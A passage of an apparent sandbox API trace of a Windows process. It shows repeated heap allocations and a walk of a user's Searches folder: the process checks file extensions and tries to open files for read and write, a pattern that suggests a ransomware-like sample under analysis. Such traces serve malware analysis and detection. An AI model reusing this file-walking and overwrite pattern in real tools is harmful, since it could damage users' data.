out: hHeap=0x6a0000) returned 1 [0187.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0187.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0187.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.773] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.773] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.773] PathFindFileNameW (pszPath="") returned="" [0187.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.774] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0187.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.774] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.774] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.775] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini") returned=".ini" [0187.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.775] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0187.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0187.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.776] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms") returned=".search-ms" [0187.776] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0187.813] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0187.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0187.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.814] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0187.814] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0187.814] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0187.814] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0187.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.815] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.815] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.839] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 